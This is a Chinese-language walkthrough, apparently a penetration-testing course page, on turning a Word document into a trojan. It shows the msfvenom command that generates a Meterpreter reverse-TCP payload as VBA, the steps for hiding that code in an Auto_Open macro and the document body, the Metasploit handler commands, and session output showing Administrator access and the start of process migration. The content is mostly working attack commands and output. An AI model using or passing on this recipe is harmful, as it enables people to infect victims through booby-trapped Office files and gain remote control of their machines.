首先将 office 2016.zip 上传到 win7 虚拟机上,解压后,安装一下 office。
┌──(root💀xuegod53)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e
x86/shikata_ga_nai -i 10 -f vba-exe
复制代码
视频教程
执行完成后会生成 2 段代码第一段代码是MACRO CODE [ˈmækrəʊ kəʊd]
宏代码从这里开始:
到这里结束:
第二段代码 payload。
注:*号中的内容不要,从这个往下开始复制,如下:
一直到最后。
打开 Word 新建空白文档,新建宏
宏名 Auto_Open
清除默认的代码,复制第一段 code 代码内容到编辑器中,然后返回到 Word 内容编辑区。
复制第二段代码 payload 到 word 正文,然后保存文档。
按 Ctrl+s 保存
MSF 配置侦听
msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
msf6 exploit(multi/handler) > jobs -K
msf6 exploit(multi/handler) > exploit
复制代码
2、配置好侦听之后我们打开我们制作的 word 文档,文档一旦打开就会执行 payload 连接到 MSF,关闭 word 文档之后 session 不受影响。
打开之后我们回到 MSF 控制台
Session 已经建立
meterpreter > getuid
Server username: XUESHEN\Administrator
复制代码
我们尝试把 payload 转移到其他进程
meterpreter > getpid 获取当前进程pid
Current pid: 2932
meterpreter > ps #查看进程列表,在ps列出的进程列表,倒数第4个就是我们进程的pid
复制代码
评论